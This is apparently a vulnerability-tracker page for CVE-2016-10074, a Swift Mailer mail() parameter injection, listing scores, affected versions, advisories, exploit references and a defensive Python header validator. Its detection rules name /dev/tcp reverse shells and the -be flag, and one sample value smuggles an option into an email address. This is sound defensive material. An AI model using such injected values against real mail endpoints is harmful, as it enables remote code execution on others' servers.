CVE-2016-10074
Published 2016-12-30
CVE-2016-10074: The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command…
Priority: P2 · 74 · critical · CVSS 3.0 base score 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: available (see the Exploit-DB entries below)
EPSS: 41.83% (98.5th percentile)
The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address in the (1) From, (2) ReturnPath, or (3) Sender header.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | libphp-swiftmailer | < libphp-swiftmailer 5.4.2-1.1 (bookworm) | libphp-swiftmailer 5.4.2-1.1 (bookworm) |
| neos | swiftmailer | >= 0 < 5.4.5 | 5.4.5 |
| swiftmailer | swiftmailer | <= 5.4.4 | — |
| swiftmailer | swiftmailer | >= 0 < 5.4.5 | 5.4.5 |
Detection & IOCs (extracted from sources)
- Detect parameter injection in Swift Mailer by monitoring for backslash double-quote sequences (\") in the From, ReturnPath, or Sender email header fields, which are used to escape out of the mail() command argument and inject extra parameters.
- Monitor outbound /dev/tcp shell connections spawned from web server processes (e.g., apache, php-fpm), which are indicative of successful exploitation resulting in a reverse shell.
- Alert on Swift_Transport_MailTransport processing email addresses containing -be or other mail command flags, as these indicate attempted parameter injection via the From/ReturnPath/Sender headers.
- The vulnerability only affects Swift Mailer versions before 5.4.5; upgrading to 5.4.5 or later fully remediates the issue. Detection rules targeting older versions should be scoped accordingly.
- The exploit targets the PHP mail() function's fifth argument (-f flag) via Swift_Transport_MailTransport; environments using SMTP transport instead of the mail() transport are not affected by this specific attack vector.
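As an added example (not code from the advisory or from Swift Mailer), the first and third rules above turned into an input check that an application can run on From/Return-Path/Sender values before they are handed to mail(); the header names, allow-list pattern and sample submissions are constructed assumptions.

```python
import re

# Header fields the advisory names as injection points.
RISKY_HEADERS = ("From", "Return-Path", "Sender")

# The exact escape the advisory describes: a backslash followed by a double quote.
BACKSLASH_QUOTE = re.compile(r'\\"')
# A whitespace-separated option token such as -be or -f inside an address value.
OPTION_TOKEN = re.compile(r'(?:^|\s)-[A-Za-z]+')
# Conservative allow-list (assumed) for an address that will become mail()'s fifth argument.
SAFE_ADDRESS = re.compile(r'^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$')


def classify_address(value):
    """Return the detection findings for one header value (empty list = clean)."""
    findings = []
    if BACKSLASH_QUOTE.search(value):
        findings.append("backslash-double-quote")
    if OPTION_TOKEN.search(value):
        findings.append("option-token")
    if not SAFE_ADDRESS.match(value):
        findings.append("fails-allowlist")
    return findings


def scan_headers(headers):
    """Apply classify_address to From/Return-Path/Sender only; other headers are ignored."""
    alerts = []
    for name, value in headers.items():
        if name in RISKY_HEADERS:
            findings = classify_address(value)
            if findings:
                alerts.append((name, findings))
    return alerts


if __name__ == "__main__":
    # Constructed sample submissions (hypothetical contact-form input, not advisory data).
    samples = [
        {"From": "alice@example.com", "Subject": "hello"},
        {"Sender": "bob-smith@example.org"},              # hyphen in local part: not an option
        {"Return-Path": '"a\\" -be test "@example.com'},  # escape plus option token: alert
    ]
    for headers in samples:
        print(headers, "->", scan_headers(headers) or "clean")
```

A value that fails only the allow-list (for example a display name with an address) is still rejected here, which is the intended failure mode: the fifth argument of mail() should only ever receive a bare, validated address.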
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| ghsa | — | 9.8 | CRITICAL | — |
| osv | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 9.8 | CRITICAL | — |
Debian
CVE-2016-10074: libphp-swiftmailer (vendor_debian · 2016 · CVSS 9.8 · CRITICAL)
Scope: local
bookworm: resolved (fixed in 5.4.2-1.1)
bullseye: resolved (fixed in 5.4.2-1.1)
forky: resolved (fixed in 5.4.2-1.1)
sid: resolved (fixed in 5.4.2-1.1)
GHSA
Flow Swift Mailer package Remote code execution (ghsa · 2024-05-17 · CVSS 9.8 · CRITICAL)
A remote code execution vulnerability has been found in the Swift Mailer library (swiftmailer/swiftmailer) recently. [See this advisory for details](http://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html). If you are not using the default mail() transport, this particular problem does not affect you. Upgrading is of course still recommended!
OSV
Flow Swift Mailer package Remote code execution (osv · 2024-05-17 · CVSS 9.8 · CRITICAL)
Same advisory text as the GHSA "Flow Swift Mailer package Remote code execution" entry.
OSV
Swift Mailer mail transport Command Injection (osv · 2022-05-17 · CRITICAL)
Same description as the CVE summary above.
GHSA
Swift Mailer mail transport Command Injection (ghsa · 2022-05-17 · CRITICAL · CWE-77)
Same description as the CVE summary above.
OSV
CVE-2016-10074 (osv · 2016-12-30 · CVSS 9.8 · CRITICAL)
Same description as the CVE summary above.
No detection rules found.
Exploit-DB
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution (exploitdb · 2017-06-21 · CVSS 9.8 · CRITICAL)
Exploit-DB
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution (exploitdb · 2017-01-02 · CVSS 9.8 · CRITICAL)
Exploit-DB
SwiftMailer < 5.4.5-DEV - Remote Code Execution (exploitdb · 2016-12-28 · CVSS 9.8 · CRITICAL)
Bugzilla
CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function (bugzilla · 2017-01-02 · CVSS 9.8 · CRITICAL)
A vulnerability was found in swiftmailer. A remote code execution could be achieved by passing a maliciously crafted expression to the vulnerable application.
References:
http://seclists.org/oss-sec/2016/q4/774
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
Discussion:
Created php-swiftmailer tracking bugs for this issue:
Affects: fedora-all [bug 1409518]
Affects: epel-7 [bug 1409519]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Bugzilla
CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function [fedora-all] (bugzilla · 2017-01-02 · CVSS 9.8 · CRITICAL)
Bugzilla
CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function [epel-7] (bugzilla · 2017-01-02 · CVSS 9.8 · CRITICAL)
References
- http://packetstormsecurity.com/files/140290/SwiftMailer-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2016/Dec/86
- http://www.debian.org/security/2017/dsa-3769
- http://www.securityfocus.com/bid/95140
- https://github.com/swiftmailer/swiftmailer/blob/5.x/CHANGES
- https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
- https://www.exploit-db.com/exploits/40972/
- https://www.exploit-db.com/exploits/40986/
- https://www.exploit-db.com/exploits/42221/
Published: 2016-12-30